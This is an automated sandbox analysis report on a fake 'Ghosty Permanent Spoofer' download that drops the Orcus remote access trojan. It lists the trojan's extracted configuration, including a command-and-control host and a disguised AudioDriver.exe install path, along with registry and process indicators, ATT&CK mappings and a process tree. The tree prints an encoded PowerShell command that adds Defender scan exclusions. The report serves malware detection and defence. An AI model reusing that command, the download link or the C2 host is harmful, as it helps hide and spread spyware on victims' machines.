orcus | hxxps://gofile[.]io/d/dg0UQ7

Resubmissions

09-02-2025 18:22

250209-wz42vaynbq 8

09-02-2025 17:59

250209-wk1e4sykhm 10

Analysis

max time kernel
380s
max time network
387s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250128-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-02-2025 17:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/dg0UQ7

Score

10^/10

orcus defense_evasion discovery rat spyware stealer

Malware Config

Extracted

Family

orcus

another-contains.gl.at.ply.gg

Mutex

a49af69032c94d6fa7c0d2639d32f038

Attributes

administration_rights_required
false
anti_debugger
false
anti_tcp_analyzer
false
antivm
false
autostart_method
1
change_creation_date
false
force_installer_administrator_privileges
false
hide_file
false
install
false
installation_folder
%appdata%\Microsoft\Speech\AudioDriver.exe
installservice
false
keylogger_enabled
false
newcreationdate
12/24/2024 02:03:43
plugins
AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==
reconnect_delay
10000
registry_autostart_keyname
Audio HD Driver
registry_hidden_autostart
false
set_admin_flag
false
tasksch_name
Audio HD Driver
tasksch_request_highest_privileges
false
try_other_autostart_onfail
false

aes.plain

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000\Control Panel\International\Geo\Nation	GHOSTYFN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000\Control Panel\International\Geo\Nation	spoof.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000\Control Panel\International\Geo\Nation	GHOSTYFN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000\Control Panel\International\Geo\Nation	GHOSTYFN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000\Control Panel\International\Geo\Nation	GHOSTYFN.exe

Executes dropped EXE 14 IoCs

pid	Process
5508	GHOSTYFN.exe
5712	GHOSTYFN.exe
5852	spoof.exe
6108	AudioDriver.exe
5776	KA-MemIntegrity_x86_x64_v1.1.exe
5864	GHOSTYFN.exe
6120	GHOSTYFN.exe
5216	spoof.exe
4476	GHOSTYFN.exe
4300	GHOSTYFN.exe
2608	spoof.exe
3124	GHOSTYFN.exe
5320	GHOSTYFN.exe
5964	spoof.exe

Loads dropped DLL 29 IoCs

pid	Process
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
5712	GHOSTYFN.exe
6108	AudioDriver.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
6120	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
4300	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe
5320	GHOSTYFN.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AudioDriver.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2780138426-956448432-1440988935-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.rar:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5636	powershell.exe
5636	powershell.exe
5636	powershell.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
6108	AudioDriver.exe
6108	AudioDriver.exe
6108	AudioDriver.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5264	taskmgr.exe
4608	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3512	firefox.exe
Token: SeDebugPrivilege	3512	firefox.exe
Token: SeDebugPrivilege	3512	firefox.exe
Token: SeRestorePrivilege	3476	7zG.exe
Token: 35	3476	7zG.exe
Token: SeSecurityPrivilege	3476	7zG.exe
Token: SeSecurityPrivilege	3476	7zG.exe
Token: SeRestorePrivilege	5372	7zG.exe
Token: 35	5372	7zG.exe
Token: SeSecurityPrivilege	5372	7zG.exe
Token: SeSecurityPrivilege	5372	7zG.exe
Token: SeDebugPrivilege	5636	powershell.exe
Token: SeDebugPrivilege	6108	AudioDriver.exe
Token: SeIncreaseQuotaPrivilege	5636	powershell.exe
Token: SeSecurityPrivilege	5636	powershell.exe
Token: SeTakeOwnershipPrivilege	5636	powershell.exe
Token: SeLoadDriverPrivilege	5636	powershell.exe
Token: SeSystemProfilePrivilege	5636	powershell.exe
Token: SeSystemtimePrivilege	5636	powershell.exe
Token: SeProfSingleProcessPrivilege	5636	powershell.exe
Token: SeIncBasePriorityPrivilege	5636	powershell.exe
Token: SeCreatePagefilePrivilege	5636	powershell.exe
Token: SeBackupPrivilege	5636	powershell.exe
Token: SeRestorePrivilege	5636	powershell.exe
Token: SeShutdownPrivilege	5636	powershell.exe
Token: SeDebugPrivilege	5636	powershell.exe
Token: SeSystemEnvironmentPrivilege	5636	powershell.exe
Token: SeRemoteShutdownPrivilege	5636	powershell.exe
Token: SeUndockPrivilege	5636	powershell.exe
Token: SeManageVolumePrivilege	5636	powershell.exe
Token: 33	5636	powershell.exe
Token: 34	5636	powershell.exe
Token: 35	5636	powershell.exe
Token: 36	5636	powershell.exe
Token: SeDebugPrivilege	5264	taskmgr.exe
Token: SeSystemProfilePrivilege	5264	taskmgr.exe
Token: SeCreateGlobalPrivilege	5264	taskmgr.exe
Token: SeDebugPrivilege	3512	firefox.exe
Token: SeDebugPrivilege	3512	firefox.exe
Token: SeDebugPrivilege	3512	firefox.exe
Token: 33	5264	taskmgr.exe
Token: SeIncBasePriorityPrivilege	5264	taskmgr.exe
Token: SeDebugPrivilege	5776	KA-MemIntegrity_x86_x64_v1.1.exe
Token: SeDebugPrivilege	6128	powershell.exe
Token: SeIncreaseQuotaPrivilege	6128	powershell.exe
Token: SeSecurityPrivilege	6128	powershell.exe
Token: SeTakeOwnershipPrivilege	6128	powershell.exe
Token: SeLoadDriverPrivilege	6128	powershell.exe
Token: SeSystemProfilePrivilege	6128	powershell.exe
Token: SeSystemtimePrivilege	6128	powershell.exe
Token: SeProfSingleProcessPrivilege	6128	powershell.exe
Token: SeIncBasePriorityPrivilege	6128	powershell.exe
Token: SeCreatePagefilePrivilege	6128	powershell.exe
Token: SeBackupPrivilege	6128	powershell.exe
Token: SeRestorePrivilege	6128	powershell.exe
Token: SeShutdownPrivilege	6128	powershell.exe
Token: SeDebugPrivilege	6128	powershell.exe
Token: SeSystemEnvironmentPrivilege	6128	powershell.exe
Token: SeRemoteShutdownPrivilege	6128	powershell.exe
Token: SeUndockPrivilege	6128	powershell.exe
Token: SeManageVolumePrivilege	6128	powershell.exe
Token: 33	6128	powershell.exe
Token: 34	6128	powershell.exe
Token: 35	6128	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3476	7zG.exe
5372	7zG.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe
5264	taskmgr.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
3512	firefox.exe
5508	GHOSTYFN.exe
5776	KA-MemIntegrity_x86_x64_v1.1.exe
5864	GHOSTYFN.exe
4476	GHOSTYFN.exe
3124	GHOSTYFN.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3392 wrote to memory of 3512	3392	firefox.exe	86
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2824	3512	firefox.exe	87
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88
PID 3512 wrote to memory of 2352	3512	firefox.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://gofile.io/d/dg0UQ7"
1⤵
- Suspicious use of WriteProcessMemory
PID:3392
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://gofile.io/d/dg0UQ7
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1896 -prefsLen 27175 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1f215db-e3b6-4b60-819e-5f504aa4fb84} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" gpu
    3⤵
    PID:2824
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2396 -prefsLen 28095 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec939e22-9ee3-452f-94aa-0a8103cd3806} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" socket
    3⤵
    PID:2352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2856 -prefMapHandle 2968 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6def326-1dec-44ea-a671-27a239ae287d} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:2808
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3864 -childID 2 -isForBrowser -prefsHandle 3856 -prefMapHandle 3852 -prefsLen 32585 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a12273c-c460-4520-bd7d-abf199ef0d2f} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:5104
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4856 -prefsLen 32585 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {981cc601-0cee-444c-b9e3-ceab9775fac0} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" utility
    3⤵
    - Checks processor information in registry
    PID:4604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5196 -childID 3 -isForBrowser -prefsHandle 5188 -prefMapHandle 5184 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0bd9d17-ccb4-456b-a9a4-ac9496458303} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:1544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 4 -isForBrowser -prefsHandle 5376 -prefMapHandle 5320 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b1d58fd-41b1-434e-a13b-078af0250241} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:1548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5512 -prefMapHandle 5344 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f785430b-7729-43b8-88e1-a454b8cdee00} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:3004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2732 -childID 6 -isForBrowser -prefsHandle 4332 -prefMapHandle 4036 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1208 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {134803d2-82c7-4c36-bfb9-4945efb4b014} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" tab
    3⤵
    PID:228

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4564

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\" -spe -an -ai#7zMap28072:110:7zEvent22717
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3476

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\" -spe -an -ai#7zMap5805:110:7zEvent29374
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5372

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe
"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5508
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5636
- C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5712
- C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5852
- - C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6108

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5264

C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\KA-MemIntegrity_x86_x64_v1.1.exe
